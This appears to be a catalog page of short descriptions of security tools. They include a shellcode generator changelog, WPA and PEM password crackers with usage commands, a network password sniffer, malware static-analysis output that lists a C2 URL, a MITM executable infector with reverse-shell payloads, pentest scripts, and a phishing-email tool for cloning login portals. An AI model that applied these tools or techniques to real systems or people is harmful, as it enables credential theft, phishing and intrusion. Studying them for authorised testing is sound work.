With the -wizard switch you are able to generate shellcode without long ARGVs; the software will ask you for the information it needs.

Note: While using the -wizard switch, if you press “Enter” without typing anything, the default value is assigned to the variable.
Note: Entering “list” shows the list of accepted values.

Available Features
  • add length calculator for output
  • add filename writer in gcc commandline in output file
  • fixed bug in encoding module not available.
  • fixed bug in os module not available
  • add “-wizard” switch
  • add installer “use ‘zsc’ commandline in terminal after installed”
  • add uninstaller
  • This Software just could be run on linux since this version
  • change output to .c file and automated shellcode generating
  • add color output for terminal
  • add inc encoding chmod() [linux_x86]
  • add inc_timesyouwant chmod() [linux_x86]
  • add dec encoding chmod() [linux_x86]
  • add dec_timesyouwant chmod() [linux_x86]
  • add features table inside “features_table.html”
  • add -about to menu for developers name and etc
  • fixed permission number calculating in chmod() [linux_x86]
  • software’s signature changes
  • bug fix reported by user in executing on linux , color function
  • add xor_random encoding chmod() [linux_x86]
  • add xor_yourvalue encoding chmod() [linux_x86]
  • add add_random encoding chmod() [linux_x86]
  • add add_yourvalue encoding chmod() [linux_x86]
  • add sub_random encoding chmod() [linux_x86]
  • add sub_yourvalue encoding chmod() [linux_x86]
  • fixed shellcode encode type checking
  • [linux_x86 modules completed]
  • add script_executor() [linux - using command execution]
  • add download_execute() [linux_x86 - using command execution (wget)]
  • add download() [linux_x86 - using command execution (wget)]
  • add dir_create() [linux_x86 using command execution]
  • add file_create() [linux_x86 using command execution]
  • add encodes file for next version released
  • add system() [linux_x86 command execute]
  • fixed chmod filename ¼ char length [linux_x86]
  • fixed exec filename ¼ char length [linux_x86]
  • fixed write filename ¼ length [linux_x86]
  • fixed write content ¼ length [linux_x86]
  • fixed write length calculator [linux_x86]
  • and fixed some other bugs in coding [core]
  • system() function added in script, you can use it to do anything and generate any command line shellcode.
  • add chmod() [linux_x86] -> chmod(‘/path/file’,‘perm_num’)
  • add write() [linux_x86] -> write(‘/path/file’,‘content’)
  • add exec() [linux_x86] -> exec(‘/path/file’)
  • add encode [none - all os]
  • add mix_all encoding in chmod() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86]
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86]
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in file_create() [linux_x86]
  • add xor_yourvalue encoding in file_create() [linux_x86]
  • add add_random encoding in file_create() [linux_x86]
  • add add_yourvalue encoding in file_create() [linux_x86]
  • add sub_random encoding in file_create() [linux_x86]
  • add sub_yourvalue encoding in file_create() [linux_x86]
  • add inc encoding in file_create() [linux_x86]
  • add inc_timesyouwant encoding in file_create() [linux_x86]
  • add dec encoding in file_create() [linux_x86]
  • add dec_timesyouwant encoding in file_create() [linux_x86]
  • add mix_all encoding in file_create() [linux_x86]
  • add xor_random encoding in dir_create() [linux_x86]
  • add xor_yourvalue encoding in dir_create() [linux_x86]
  • add add_random encoding in dir_create() [linux_x86]
  • add add_yourvalue encoding in dir_create() [linux_x86]
  • add sub_random encoding in dir_create() [linux_x86]
  • add sub_yourvalue encoding in dir_create() [linux_x86]
  • add inc encoding in dir_create() [linux_x86]
  • add inc_timesyouwant encoding in dir_create() [linux_x86]
  • add dec encoding in dir_create() [linux_x86]
  • add dec_timesyouwant encoding in dir_create() [linux_x86]
  • add mix_all encoding in dir_create() [linux_x86]
  • add xor_random encoding in download() [linux_x86]
  • add xor_yourvalue encoding in download() [linux_x86]
  • add add_random encoding in download() [linux_x86]
  • add add_yourvalue encoding in download() [linux_x86]
  • add sub_random encoding in download() [linux_x86]
  • add sub_yourvalue encoding in download() [linux_x86]
  • add inc encoding in download() [linux_x86]
  • add inc_timesyouwant encoding in download() [linux_x86]
  • add dec encoding in download() [linux_x86]
  • add dec_timesyouwant encoding in download() [linux_x86]
  • add mix_all encoding in download() [linux_x86]
  • add xor_random encoding in download_execute() [linux_x86]
  • add xor_yourvalue encoding in download_execute() [linux_x86]
  • add add_random encoding in download_execute() [linux_x86]
  • add add_yourvalue encoding in download_execute() [linux_x86]
  • add sub_random encoding in download_execute() [linux_x86]
  • add sub_yourvalue encoding in download_execute() [linux_x86]
  • add inc encoding in download_execute() [linux_x86]
  • add inc_timesyouwant encoding in download_execute() [linux_x86]
  • add dec encoding in download_execute() [linux_x86]
  • add dec_timesyouwant encoding in download_execute() [linux_x86]
  • add mix_all encoding in download_execute() [linux_x86]
  • add xor_random encoding in system() [linux_x86]
  • add xor_yourvalue encoding in system() [linux_x86]
  • add add_random encoding in system() [linux_x86]
  • add add_yourvalue encoding in system() [linux_x86]
  • add sub_random encoding in system() [linux_x86]
  • add sub_yourvalue encoding in system() [linux_x86]
  • add inc encoding in system() [linux_x86]
  • add inc_timesyouwant encoding in system() [linux_x86]
  • add dec encoding in system() [linux_x86]
  • add dec_timesyouwant encoding in system() [linux_x86]
  • add mix_all encoding in system() [linux_x86]
  • add xor_random encoding in script_executor() [linux_x86]
  • add xor_yourvalue encoding in script_executor() [linux_x86]
  • add add_random encoding in script_executor() [linux_x86]
  • add add_yourvalue encoding in script_executor() [linux_x86]
  • add sub_random encoding in script_executor() [linux_x86]
  • add sub_yourvalue encoding in script_executor() [linux_x86]
  • add inc encoding in script_executor() [linux_x86]
  • add inc_timesyouwant encoding in script_executor() [linux_x86]
  • add dec encoding in script_executor() [linux_x86]
  • add dec_timesyouwant encoding in script_executor() [linux_x86]
  • add mix_all encoding in script_executor() [linux_x86]
  • add add_random encoding in write() [linux_x86]
  • add xor_random encoding in write() [linux_x86]
  • add sub_random encoding in write() [linux_x86]
  • add xor_random encoding in exec() [linux_x86]
  • add sub_random encoding in exec() [linux_x86]
  • add add_random encoding in exec() [linux_x86]
  • fixed bug in system() when len(command) is less than 5
  • fixed bug in encode module add_random chmod() [linux_x86] 

Packet Sender - The UDP and TCP Network Test Utility


Packet Sender is an open source utility to allow sending and receiving TCP and UDP packets. It is available free (no ads / no bundleware) for Windows, Mac, and Linux. It can be used for both commercial and personal use (license). It's designed to be very easy to use while still providing enough features for power users to do what they need.

Mobile 

The native mobile versions have been abandoned to focus on the more popular and more capable desktop version. However, the GitHub projects for both iOS and Android are MIT Licensed and available for forking.



Change log
  • Version 2015-04-19
    • Portable mode
    • Read in file from command line
    • Save traffic log
    • Mobile versions have been abandoned. Project focus is now on the far more popular desktop version.
  • Version 2015-02-13
    • Migrated to GitHub
    • New vector-based logo
    • Bug fix in quick-disable/enable
    • Migrated to Qt 5.4
    • Ubuntu version brought up to date.
    • Forums are closed (spammers killed it).
  • Version 2014-10-07
    • Initial launch of forums.
    • Multi-Send.
    • Quick-send from traffic log selected packets.
    • Packet Export/Import.
    • Rolling traffic log support.
    • Numerous configuration settings added:
      • Copy raw packet data to clipboard.
      • Receive before send.
      • Connection delays for slow devices.
    • Command line interface default binds to 0.
    • Universal (XP through 8.1) Windows installer.
    • Migrated to Qt 5.3
    • Some rework of the "About" section.
  • Version 2014-02-22
    • TCP connections are now fully threaded (no more UI freezes).
    • Brand new and highly capable command line interface. (Run PacketSender --help)
    • Some mild UI enhancements to make sending easier.
    • Ubuntu version brought up to date.
    • Windows XP now separated.
    • Qt 5.2
  • Version 1.5 (Mobile)
    • Android version released.
  • Version 2013-11-18
    • Copy to Clipboard button on traffic log.
    • Name prompt for traffic log.
  • Version 2013-11-11
    • Bad installer on Windows. No other changes made.
  • Version 2013-11-09
    • Searching packets from traffic log.
    • Fixed some traffic log stability problems.
  • Version 2013-11-05
    • Added resending packets at user-specified intervals.
    • Traffic log sped up significantly.
    • Packet searching.
    • Table headers (both saved packets and traffic log) can be rearranged.
    • Response packet for TCP actually works now.
    • Response packet data can be manually updated.
    • About / License stuff moved to another tab.
    • Internal libraries updated.
  • Version 2013-10-20
    • 64-bit Ubuntu and Linux Mint support.
  • Version 2013-10-14
    • Ubuntu and Linux Mint support.
  • Version 2013-05-20
    • Saving is less quirky.
    • Domain names can be used in IP address line. Packet Sender will do a quick lookup to find the IP.
    • Internal libraries updated.
  • Version 2012-09-12
    • Public release of desktop version.

Download Packet Sender

PackETH - Ethernet Packet Generator


PackETH is a GUI and CLI packet generator tool for Ethernet. It allows you to create and send any possible packet or sequence of packets on the Ethernet link. It is very simple to use, powerful, and supports many adjustments of parameters while sending a sequence of packets. And lastly, it has the most beautiful web site of all the packet generators.

Features
  • you can create and send any ethernet packet. Supported protocols:
    • ethernet II, ethernet 802.3, 802.1q, QinQ, user defined ethernet frame
    • ARP, IPv4, IPv6, user defined network layer payload
    • UDP, TCP, ICMP, ICMPv6, IGMP, user defined transport layer payload
    • RTP (payload with options to send a sine wave of any frequency for G.711)
    • JUMBO frames (if network driver supports it)
  • sending sequence of packets
    • delay between packets, number of packets to send
    • sending with max speed, approaching the theoretical boundary
    • change parameters while sending (change IP & mac address, UDP payload, 2 user defined bytes, etc.)
  • saving configuration to a file and loading it back - pcap format supported


Download PackETH

Passgen - Random Character Generator Crunch to Crack WPA/WPA2


Passgen is an alternative to the random character generator crunch. It attempts to solve cracking WPA/WPA2 keys by randomizing the output, as opposed to generating a sequential list like (aaaaaaaa, aaaaaaab, aaaaaac, etc).

Example usage with aircrack-ng
python passgen.py -l | sudo aircrack-ng --bssid 00:11:22:33:44:55 -w- WiFi.cap

Argument switches are as follows:
-l lowercase ascii
-l1 lowercase ascii + digits(0-9)
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length


Download Passgen

Password Cracking Suite


How To Use It:

Dics Path:
In this path, you can add any dictionary you would like to use.

Tools Path:
In this path, the script will install 3rd party tools. You can download some here:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-cracking-mega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html

Tools used by the script:

Available Hash Types:
afs bf bfegg bsdi crc32 crypt
des django dmd5 dominosec dragonfly3-32 dragonfly3-64
dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n
epi episerver gost hdaa hmac-md5 hmac-sha1
hmac-sha224 hmac-sha256 hmac-sha384 hmac-sha512
hmailserver ipb2 keepass keychain krb4 krb5 lm lotus5
md4-gen md5 md5ns mediawiki mscash mscash2 mschapv2
mskrb5 mssql mssql05 mysql mysql-sha1 nethalflm netlm
netlmv2 netntlm netntlmv2 nsldap nt nt2 odf office
oracle oracle11 osc pdf phpass phps pix-md5 pkzip po
pwsafe racf rar raw-md4 raw-md5 raw-md5u raw-sha
raw-sha1 raw-sha1-linkedin raw-sha1-ng raw-sha224
raw-sha256 raw-sha384 raw-sha512 salted-sha1 sapb
sapg sha1-gen sha256crypt sha512crypt sip ssh
sybasease trip vnc wbb3 wpapsk xsha xsha512 zip


Download Password Cracking Suite

Password Sniffer Console - Command-line Tool to Sniff and Capture HTTP/FTP/POP3/SMTP/IMAP Passwords


Password Sniffer Console is the all-in-one command-line based Password Sniffing Tool to capture Email, Web and FTP login passwords passing through the network.

It automatically detects the login packets on the network for various protocols and instantly decodes the passwords.

Here is the list of supported protocols,
  • HTTP (BASIC authentication)
  • FTP
  • POP3
  • IMAP
  • SMTP

In addition to recovering your own lost passwords, you can use this tool in the following scenarios:
  • Run it on a gateway system where all of your network's traffic passes through.
  • In a MITM attack, run it on the middle system to capture the passwords from the target system.
  • On a multi-user system, run it under an Administrator account to silently capture passwords for all the users.

It includes an installer which installs WinPcap, the network capture driver required for sniffing. For Windows 8, first you have to manually install the WinPcap driver (in Windows 7 Compatibility mode) and then run our installer to install only Password Sniffer Console.

It is a very useful tool for penetration testers and being a command-line tool makes it suitable for automation.

It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Requirements
PasswordSnifferConsole requires WinPcap (http://www.winpcap.org), the industry-standard packet capture library for Windows. By default the latest version of WinPcap (as of this writing v4.1.2) is installed automatically during the installation of Password Sniffer Console.

However if you don't want it, you can uncheck it during installation and later install the latest version manually.


Download Password Sniffer Console

PEframe - Tool to perform static analysis on Portable Executable malware

PEframe is an open source tool to perform static analysis on Portable Executable malware.

Usage
$ peframe malware.exe
$ peframe [--option] malware.exe

Options
--json         Output in json

--import       Imported function and dll
--export       Exported function and dll

--dir-import   Import directory
--dir-export   Export directory
--dir-resource Resource directory
--dir-debug    Debug directory
--dir-tls      TLS directory

--strings      Get all strings
--sections     Sections information
--dump         Dump all information

Install
Prerequisites
Python 2.6.5 -> 2.7.x
Install
from pypi
# pip install https://github.com/guelfoweb/peframe/archive/master.zip
from git
$ git clone https://github.com/guelfoweb/peframe.git

$ cd peframe

# python setup.py install

Example
$ peframe malware.exe

Short information
------------------------------------------------------------
File Name          malware.exe
File Size          935281 byte
Compile Time       2012-01-29 22:32:28
DLL                False
Sections           4
Hash MD5           cae18bdb8e9ef082816615e033d2d85b
Hash SAH1          546060ad10a766e0ecce1feb613766a340e875c0
Imphash            353cf96592db561b5ab4e408464ac6ae
Detected           Xor, Sign, Packer, Anti Debug, Anti VM
Directory          Import, Resource, Debug, Relocation, Security

XOR discovered
------------------------------------------------------------
Key length         Offset (hex)       Offset (dec)
1                  0x5df4e            384846
2                  0x5df4e            384846
4                  0x5df4e            384846
8                  0x5df4e            384846

Digital Signature
------------------------------------------------------------
Virtual Address    12A200
Block Size         4813 byte
Hash MD5           63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1         53731a283d0c251f7c06f6d7d423124689873c62

Packer matched [4]
------------------------------------------------------------
Packer             Microsoft Visual C++ v6.0
Packer             Microsoft Visual C++ 5.0
Packer             Microsoft Visual C++
Packer             Installer VISE Custom

Anti Debug discovered [9]
------------------------------------------------------------
Anti Debug         FindWindowExW
Anti Debug         FindWindowW
Anti Debug         GetWindowThreadProcessId
Anti Debug         IsDebuggerPresent
Anti Debug         OutputDebugStringW
Anti Debug         Process32FirstW
Anti Debug         Process32NextW
Anti Debug         TerminateProcess
Anti Debug         UnhandledExceptionFilter

Anti VM Trick discovered [2]
------------------------------------------------------------
Trick              Virtual Box
Trick              VMware trick

Suspicious API discovered [35]
------------------------------------------------------------
Function           CreateDirectoryA
Function           CreateFileA
Function           CreateFileMappingA
Function           CreateToolhelp32Snapshot
Function           DeleteFileA
Function           FindFirstFileA
Function           FindNextFileA
Function           GetCurrentProcess
Function           GetFileAttributesA
Function           GetFileSize
Function           GetModuleHandleA
Function           GetProcAddress
Function           GetTempPathA
Function           GetTickCount
Function           GetUserNameA
Function           GetVersionExA
Function           InternetCrackUrlA
Function           LoadLibraryA
Function           MapViewOfFile
Function           OpenProcess
Function           Process32First
Function           Process32Next
Function           RegCloseKey
Function           RegCreateKeyA
Function           RegEnumKeyExA
Function           RegOpenKeyA
Function           RegOpenKeyExA
Function           Sleep
Function           WSAStartup
Function           WriteFile
Function           closesocket
Function           connect
Function           recv
Function           send
Function           socket

Suspicious Sections discovered [2]
------------------------------------------------------------
Section            .data
Hash MD5           b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1         523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section            .rdata
Hash MD5           41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1         b674141b34f843d54865a399edfca44c3757df59

File name discovered [43]
------------------------------------------------------------
Binary             wiseftpsrvs.bin
Data               ESTdb2.dat
Data               Favorites.dat
Data               History.dat
Data               bookmark.dat
Data               fireFTPsites.dat
Data               quick.dat
Data               site.dat
Data               sites.dat
Database           FTPList.db
Database           sites.db
Database           NovaFTP.db
Executable         unleap.exe
Executable         explorer.exe
FTP Config         FTPVoyager.ftp
Library            crypt32.dll
Library            kernel32.dll
Library            mozsqlite3.dll
Library            userenv.dll
Library            wand.dat
Library            wininet.dll
Library            wsock32.dll
Text               Connections.txt
Text               ftplist.txt
Text               signons.txt
Text               signons2.txt
Text               signons3.txt

Url discovered [2]
------------------------------------------------------------
Url                RhinoSoft.com
Url                http://0uk.net/zaaqw/gate.php

Meta data found [4]
------------------------------------------------------------
CompiledScript      AutoIt v3 Script
FileVersion         3, 3, 8, 1
FileDescription
Translation         0x0809 0x04b0


Download PEframe

PEInjector - MITM PE file infector


The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. It creates patches, which are then applied seamlessly during file transfer. It is very performant, lightweight, modular and can be operated on embedded hardware.

Features
  • Full x86 and x64 PE file support.
  • Open Source
  • Fully working on Windows and Linux, including automated installation scripts.
  • Can be operated on embedded hardware, tested on a Raspberry Pi 2.
  • On Linux, all servers will be automatically integrated as a service, no manual configuration required.
  • Plain C, no external libraries required (peinjector).
  • MITM integration is available in C, Python and Java. A sample Python MITM implementation is included.
  • Foolproof, mobile-ready web interface. Anyone who can configure a home router can configure the injector server.
  • Easy to use integrated shellcode factory, including reverse shells, meterpreter, ... or own shellcode. Everything is available in 32 and 64 bit with optional automated encryption. Custom shellcode can be injected directly or as a new thread.
  • An awesome about page and much more, check it out.

Pemcracker - Tool To Crack Encrypted PEM Files

This tool is inspired by pemcrack by Robert Graham. The purpose is to attempt to recover the password for encrypted PEM files while utilizing all the CPU cores.

It still uses high level OpenSSL calls in order to guess the password. As an optimization, instead of continually checking against the PEM on disk, it is loaded into memory in each thread.

bwall@ragnarok:~$ ./pemcracker 
pemcracker 0.1.0
pemcracker <path to pem> <word file>

pemcracker 0.1.0 by Brian Wallace (@botnet_hunter)

Usage Example
bwall@ragnarok:~/data/publicprojects/pemcracker$ ./pemcracker test.pem test.dict
Password is komodia for test.pem

Compiling
make
This is somewhat of a short side project, so my apologies for any issues. If there is desire for this project to be further developed, I will try to allocate time.

Alternatives
If you are looking for the fastest possible method of brute forcing PEM files, you may wish to try out John the Ripper. Its little-known ssh2john allows for converting PEM files to a format that can be fed into ./john. Details


Download Pemcracker

PentestBox - Portable Penetration Testing Distribution for Windows Environments


PentestBox is not like other Penetration Testing Distributions, which run on virtual machines. It was created because more than 50% of penetration testing distribution users use Windows.

So it provides an efficient platform for Penetration Testing on windows platform.
Check out demo video:


Easy To Use

It is a command-line utility, which is all you want.

Awesome Design

It is the same green font on a black terminal, but in a modern way. I am pretty sure you will like it.

Best Performance

PentestBox directly runs on host machine instead of virtual machines, so performance is obvious.

No Dependencies Needed

All the dependencies required by the tools are inside PentestBox, so you can even run PentestBox on a freshly installed Windows without any hassle.

Portable

PentestBox is entirely portable, so now you can carry your own Penetration Testing Environment on a USB stick. It will take care of the dependencies required to run the tools inside it.

Linux Environment

PentestBox contains nearly all Linux utilities like bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others.

Tools category

How to include your own Tool

If you want to include a tool which is not currently present in PentestBox then below are the ways to include it.
  • If it is Python based program
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • As Python is configured inside PentestBox, you can directly go to that directory and then run that program by prepending python to the filename.
    • But if you want to set an alias for that program then please follow How to add an alias
  • If it is Ruby Based Program
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • As Ruby is configured inside PentestBox, you can directly go to that directory and then run that program by prepending ruby to the filename.
    • But if you want to set an alias for that program then please follow How to add an alias
  • If it is an executable file
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • You can directly access by moving to that folder and typing the filename.
    • But if you want to set an alias for that program then please follow How to add an alias

Download PentestBox

PentestPackage - A Package of Multiple Pentest Scripts


Contents:

  • Wordlists - Comprises password lists, username lists and subdomains
  • Web Service finder - Finds web services of a list of IPs and also returns any URL rewrites
  • Gpprefdecrypt.* - Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
  • rdns.sh - Runs through a file of line-separated IPs and prints whether there is a reverse DNS set or not.
  • grouppolicypwn.sh - Enter domain user creds (doesn't need to be privileged) and it will communicate with the domain controllers, pull any stored CPASS from group policies and decode it to plain text. Useful for instant Domain Admin!
  • privchecker.sh - Very young script that simply checks DCenum against a list of users to find their group access, indicating any privileged users; this list can be edited.
  • NessusParserSummary.py - Parses Nessus results to give a summary breakdown of findings plus a host count next to each.
  • NessusParserBreakdown.py - Parses Nessus results to give a host based breakdown of findings plus the port(protocol) and CVSS rating.
  • NmapParser.py - Parses raw NMAP results (or .nmap) and will create individual .csv files for each host with a breakdown of ports, service version, protocol and port status.
  • NmapPortCount.py - Parses raw NMAP results (or .nmap) and will generate a single CSV with a list of Hosts, a count of how many open/closed/filtered ports it has, the OS detection and ICMP response.
  • Plesk-creds-gatherer.sh - Used on older versions of Plesk (before the encryption came in) that allows you to pull out all the credentials from the databases using a nice Bash menu
  • BashScriptTemplate.sh - Handy boilerplate template for use in new scripts.
  • PythonScriptTemplate.py - Handy boilerplate template for use in new scripts.
  • ipexplode.pl - Simply expands CIDRs and prints the IPs in a list, handy for when you need a list of IPs and not a CIDR
  • LinEsc.sh - Linux escalation script. This will test common methods of gaining root access or show potential areas such as sticky perms that can allow manual testing for root escalation
  • gxfr.py - GXFR replicates dns zone transfers by enumerating subdomains using advanced search engine queries and conducting dns lookups.
  • knock.sh - Simple script used to test/perform port knocking.
  • sslscan-split-file.py - Used to split a large SSLScan results file into individual SSLScan results.
  • TestSSLServer.jar - Similar tool to SSLScan but with different output.
  • wiffy.sh - Wiffy hacking tool, encapsulated in a single Bash script.


Download PentestPackage

Pentoo 2015 - Security-Focused Livecd based on Gentoo


Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd. Pentoo is also available as an overlay for an existing Gentoo installation. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment. The Pentoo kernel includes grsecurity and PAX hardening and extra patches - with binaries compiled from a hardened toolchain with the latest nightly versions of some tools available.

It's basically a Gentoo install with lots of customized tools, a customized kernel, and much more. Here is a non-exhaustive list of the features currently included:
  • Hardened Kernel with aufs patches
  • Backported Wifi stack from latest stable kernel release
  • Module loading support ala slax
  • Changes saving on usb stick
  • XFCE4 wm
  • Cuda/OPENCL cracking support with development tools
  • System updates if you got it finally installed

Put simply, Pentoo is Gentoo with the pentoo overlay. This overlay is available in layman so all you have to do is layman -L and layman -a pentoo.

We have a pentoo/pentoo meta ebuild and multiple pentoo profiles, which will install all the pentoo tools based on USE flags. 

Pentoo 2015.0 RC3.8
Current Features :
  • Changes saving (including unetbooting support)
  • CUDA/OpenCL Enhanced cracking software
  • Kernel 4.0.8 and all needed patches for injection
  • XFCE 4.12
  • Please see blog for full release notes including known bootloader issues with some versions of unetbootin
  • Full tools list.

Download Pentoo 2015

Phan - Static Analyzer For PHP


Phan is a static analyzer for PHP.

Getting it running
Phan requires PHP 7+ with the php-ast extension loaded. The code you analyze can be written for any version of PHP.

To get phan running:
  1. Clone the repo
  2. Run composer install to load dependencies
  3. Run ./test to run the test suite
  4. Test phan on itself by running the following
./phan `find src/ -type f -path '*.php'`
If you don't have a version of PHP 7 installed, you can grab a php7dev Vagrant image or one of the many Docker builds out there.
Then compile php-ast . Something along these lines should do it:
git clone https://github.com/nikic/php-ast.git
cd php-ast
phpize
./configure
make install
And add extension=ast.so to your php.ini file. Check that it is there with php -m. If it isn't, you probably added it to the wrong php.ini file. Check php --ini to see where it is looking.

Features
  • Checks for calls and instantiations of undeclared functions, methods, closures and classes
  • Checks types of all arguments and return values to/from functions, closures and methods
  • Supports @param, @return, @var and @deprecated phpdoc comments including union and void/null types
  • Checks for Uniform Variable Syntax PHP 5 -> PHP 7 BC breaks
  • Undefined variable tracking
  • Supports namespaces, traits and variadics
  • Generics (from phpdoc hints - int[], string[], UserObject[], etc.)
See the tests directory for some examples of the various checks.

Usage
phan *.php
or give it a text file containing a list of files (but see the next section) to scan:
phan -f filelist.txt
and it might generate output that looks like this:
test1.php:191 UndefError call to undefined function get_real_size()
test1.php:232 UndefError static call to undeclared class core\session\manager
test1.php:386 UndefError Trying to instantiate undeclared class lang_installer
test2.php:4 TypeError arg#1(arg) is object but escapeshellarg() takes string
test2.php:4 TypeError arg#1(msg) is int but logmsg() takes string defined at sth.php:5
test2.php:4 TypeError arg#2(level) is string but logmsg() takes int defined at sth.php:5
test3.php:11 TypeError arg#1(number) is string but number_format() takes float
test3.php:12 TypeError arg#1(string) is int but htmlspecialchars() takes string
test3.php:13 TypeError arg#1(str) is int but md5() takes string
test3.php:14 TypeError arg#1(separator) is int but explode() takes string
test3.php:14 TypeError arg#2(str) is int but explode() takes string
You can see the full list of command line options by running phan -h.

Generating a file list
This static analyzer does not track includes or try to figure out autoloader magic. It treats all the files you throw at it as one big application. For code encapsulated in classes this works well. For code running in the global scope it gets a bit tricky because order matters. If you have an index.php including a file that sets a bunch of global variables and you then try to access those after the include in index.php the static analyzer won't know anything about these.
In practical terms this simply means that you should put your entry points and any files setting things in the global scope at the top of your file list. If you have a config.php that sets global variables that everything else needs put that first in the list followed by your various entry points, then all your library files containing your classes.

Bugs
When you find an issue, please take the time to create a tiny reproducing code snippet that illustrates the bug. And once you have done that, fix it. Then turn your code snippet into a test and add it to tests then ./test and send a PR with your fix and test. Alternatively, you can open an Issue with details.

More on phpdoc types
All the phpdoc types listed on that page should work with one exception. It says that (int|string)[] would indicate an array of ints or strings. phan doesn't support a mixed-type constraint like that. You can say int[]|string[] meaning that the array has to contain either all ints or all strings, but if you have mixed types, just use array.
That means you can do:
<?php
/**
 * MyFunc
 * @param int                 $arg1
 * @param int|string          $arg2
 * @param int[]|int           $arg3
 * @param Datetime|Datetime[] $arg4
 * @return array|null
 */
function MyFunc($arg1, $arg2, $arg3, $arg4=null) {
    return null;
}
Just like in PHP, any type can be nulled in the function declaration which also means a null is allowed to be passed in for that parameter.
By default, and completely arbitrarily, for things like int[] it checks the first 5 elements. If the first 5 are of the same type, it assumes the rest are as well. If it can't determine the array sub-type it just becomes array, which will pass through most type checks. In practical terms, this means that [1,2,'a'] is seen as array but [1,2,3] is int[] and ['a','b','c'] as string[].

Dealing with dynamic code that confuses the analyzer
There are times when there is just no way for the analyzer to get things right. For example:
<?php
function test() {
    $var = 0;
    $var = call_some_func_you_cant_hint();
    if(is_string($var)) {
        $pos = strpos($var, '|');
    }
}
Your best option is, of course, to go and add a /** @return string|array */ comment to the call_some_func_you_cant_hint() function, but there are times when that is not an option. As far as the analyzer is concerned, $var is an int because all it sees is the $var = 0; assignment. It will complain about you passing an int to strpos(). You can help it out by adding a @var doc-type comment before the function:
<?php
/**
 * @var string|array $var
 */
function test() {
    ...
This tells the analyzer that along with the int that it figures out on its own, $var can also be a string or an array inside that function. This is a departure from the normal use of the @var tag which is to give properties types, so I don't suggest making a habit of using this hack. But it can be handy to shut up the analyzer without having to refactor the code to not overload the same variable with many different types.

How it works
One of the big changes in PHP 7 is the fact that the parser now uses a real Abstract Syntax Tree (AST). This makes it much easier to write code analysis tools by pulling the tree and walking it looking for interesting things.
Phan has 2 passes. On the first pass it reads every file, gets the AST and recursively parses it looking only for functions, methods and classes in order to populate a bunch of global hashes which will hold all of them. It also loads up definitions for all internal functions and classes. The type info for these comes from a big file called FunctionSignatureMap.
The real complexity hits you hard in the second pass. Here some things are done recursively depth-first and others not. For example, we catch something like foreach($arr as $k=>$v) because we need to tell the foreach code block that $k and $v exist. For other things we need to recurse as deeply as possible into the tree before unrolling our way back out. For example, for something like c(b(a(1))) we need to call a(1) and check that a() actually takes an int, then get the return type and pass it to b() and check that, before doing the same to c().
There is a Scope object which keeps track of all variables. It mimics PHP's scope handling in that it has a globals along with entries for each function, method and closure. This is used to detect undefined variables and also type-checked on a return $var .

Quick Mode Explained
In Quick-mode the scanner doesn't rescan a function or a method's code block every time a call is seen. This means that the problem here won't be detected:
<?php
function test($arg):int {
    return $arg;   // $arg has no declared type, so the first scan sees nothing wrong here
}
test("abc");       // only rescanning test() with the string argument reveals the mismatch
This would normally generate:
test.php:3 TypeError return string but `test()` is declared to return int
The initial scan of the function's code block has no type information for $arg . It isn't until we see the call and rescan test()'s code block that we can detect that it is actually returning the passed in string instead of an int as declared.

Running tests
vendor/bin/phpunit


Download Phan

PhEmail - Automate Sending Phishing Emails


PhEmail is a Python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test. The main purpose of PhEmail is to send a bunch of phishing emails and prove who clicked on them, without attempting to exploit the web browser or email client but collecting as much information as possible. PhEmail comes with an engine to gather email addresses through LinkedIn, useful during the information gathering phase. Also, this tool supports Gmail authentication, which is a valid option in case the target domain has blacklisted the source email or IP address. Finally, this tool can be used to clone corporate login portals in order to steal login credentials.

Usage

PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f <from_address>] [-r <replay_address>] [-s <subject>] [-b <body>]
          -e    emails: File containing list of emails (Default: emails.txt)
          -f    from_address: Source email address displayed in FROM field of the email (Default: Name Surname <name_surname@example.com>)
          -r    reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname <name_surname@example.com>)
          -s    subject: Subject of the email (Default: Newsletter)
          -b    body: Body of the email (Default: body.txt)
          -p    pages: Specifies number of results pages searched (Default: 10 pages)
          -v    verbose: Verbose Mode (Default: false)
          -l    layout: Send email with no embedded pictures 
          -B    BeEF: Add the hook for BeEF
          -m    mail_server: SMTP mail server to connect to
          -g    Google: Use a google account username:password
          -t    Time delay: Add deleay between each email (Default: 3 sec)
          -R    Bunch of emails per time (Default: 10 emails)
          -L    webserverLog: Customise the name of the webserver log file (Default: Date time in format "%d_%m_%Y_%H_%M")
          -S    Search: query on Google
          -d    domain: of email addresses
          -n    number: of emails per connection (Default: 10 emails)
